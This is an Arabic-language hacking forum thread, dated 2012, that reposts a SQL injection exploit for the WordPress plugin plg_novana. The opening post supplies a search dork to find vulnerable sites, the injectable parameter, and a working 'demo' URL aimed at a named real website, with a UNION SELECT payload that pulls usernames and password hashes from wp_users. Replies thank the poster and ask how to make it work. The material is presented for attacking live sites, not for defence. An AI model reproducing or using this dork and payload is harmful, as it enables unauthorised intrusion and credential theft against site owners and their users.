Wordpress Plugin plg_novana Sql Injection Vulnerability

Wordpress Plugin plg_novana Sql Injection Vulnerability


النتائج 1 إلى 4 من 4

الموضوع: Wordpress Plugin plg_novana Sql Injection Vulnerability

  1. #1
    هكر نشيط الصورة الرمزية fayzoun
    تاريخ التسجيل
    Jun 2011
    الدولة
    تونس بلاد الأحرار
    المشاركات
    189

    Gadid Wordpress Plugin plg_novana Sql Injection Vulnerability

    كود PHP:
    # Exploit Title : Wordpress plg_novana plugin Sql Injection 

    # Exploit Author : Ashiyane Digital Security Team 

    # Discovered By : fayzoun 

    # Home : www.ashiyane.org 

    #Facebook : http://www.facebook.com/fayzoun.AO 

    # Security Risk : High - SQL Injection 

    # Dork : inurl:/plugins/plg_novana/novana_detail.php 

    ############################################## 

    # Expl0iTs : 

    # [Target]/wp-content/plugins/plg_novana/novana_detail.php?lightbox[width]=700&lightbox[height]=400&id=[sql] 

    # D3m0 : 

    # http://avenuepattaya.net/wp-content/plugins/plg_novana/novana_detail.php?lightbox[width]=700&lightbox[height]=400&id=-111+union+select+1,2,3,4,5,6,7,8,9,group_concat%28user_login,user_pass%29,11,12,13,14,15,16,17,18,19,20,21,22,23,24+from+wp_users-- 

    *************************************************************** 
    Sp Tnx ToMuslims From All Over The World 
    Behrooz_Ice,Q7X,Ali_Eagle,Azazel,iman_taktaz,sha2ow,0x21HATE,A.S.P.I.R.I.N,am118,Angel--D3m0n,angola,AR455,Azadâ„¢,Black-Hole,Classic,Encoder,ERroR,Hashor 
    HASSAN20,HidDeEn,hossein19123,jooooondost,Kaz3m,ll_Invisible_ll,majidflash,megacpu,MehrdadLinux,Milad-Bushehr,MostafaBestMan,MR.SAMAN,Mute,N4H,Pr0grammer,PrinceofHacking 
    Rizux,Rz04,S!YOU.T4r.6T,Sil3nt Di3,The 
    Smith
    ,unique2world,Unline,V!T0N,X-HIDDEN-
    Crypt0,khatarnak,Milad22,MR.Vinci,Pirjo,V1R4N64R 
    * And All Of My Friends 
    *************************************************************** 
    ###############################################################  
      
    # 1337day.com [2012-11-25] 
    Facebook.com/Fayzoun.AO
    و السلام
    وِراء كل ابّتُسًامة هًكر .. دُمعة ضحًيّة...

  2. #2

    افتراضي رد: Wordpress Plugin plg_novana Sql Injection Vulnerability

    لسا شيفه الان في موقع الاكسبلوت و جربته فشلت اتمني لو حد فيكم يعرف كيف التطبيق الصحيح يقولي

  3. #3

    افتراضي رد: Wordpress Plugin plg_novana Sql Injection Vulnerability

    مشكور اخي الغالي
    على الثغرة الرائعة
    تقبل مروري
    -تعلم ان>>>>>تعامل الناس كما تحب ان تعامل
    -للاهمية >>>>>خطا ان تقبل معركة يمكن تفاديها

  4. #4
    هكر متألق الصورة الرمزية brader
    تاريخ التسجيل
    Mar 2012
    الدولة
    ☆ القلب ☆
    المشاركات
    4,831

    افتراضي رد: Wordpress Plugin plg_novana Sql Injection Vulnerability

    بارك الله فيك لكن عنوان مخالف لانه مو بالعربية

    يغلق

    بالغضب والدم الاحمر نملئ قلوبنا
    سندمركم ونحرقكم جميعا
    هذا قدركم




المواضيع المتشابهه

  1. cityadmin (links.php) Blind Sql Injection Vulnerability
    بواسطة AtT4CKxT3rR0r1ST في المنتدى قسم الثغرات
    مشاركات: 2
    آخر مشاركة: 02-12-2012, 02:50 AM
  2. myBusinessAdmin (content.php) Blind Sql Injection Vulnerability
    بواسطة AtT4CKxT3rR0r1ST في المنتدى قسم الثغرات
    مشاركات: 1
    آخر مشاركة: 02-05-2010, 07:52 PM
  3. MobPartner Chat Multiple Sql Injection Vulnerability
    بواسطة AtT4CKxT3rR0r1ST في المنتدى قسم الثغرات
    مشاركات: 1
    آخر مشاركة: 02-05-2010, 07:46 PM
  4. crownweb (page.cfm) Sql Injection Vulnerability
    بواسطة AtT4CKxT3rR0r1ST في المنتدى قسم الثغرات
    مشاركات: 1
    آخر مشاركة: 02-02-2010, 02:44 PM
  5. ThinkAdmin (page.php) Sql Injection Vulnerability
    بواسطة AtT4CKxT3rR0r1ST في المنتدى قسم الثغرات
    مشاركات: 2
    آخر مشاركة: 02-01-2010, 03:03 AM

المفضلات

أذونات المشاركة

  • لا تستطيع إضافة مواضيع جديدة
  • لا تستطيع الرد على المواضيع
  • لا تستطيع إرفاق ملفات
  • لا تستطيع تعديل مشاركاتك
  •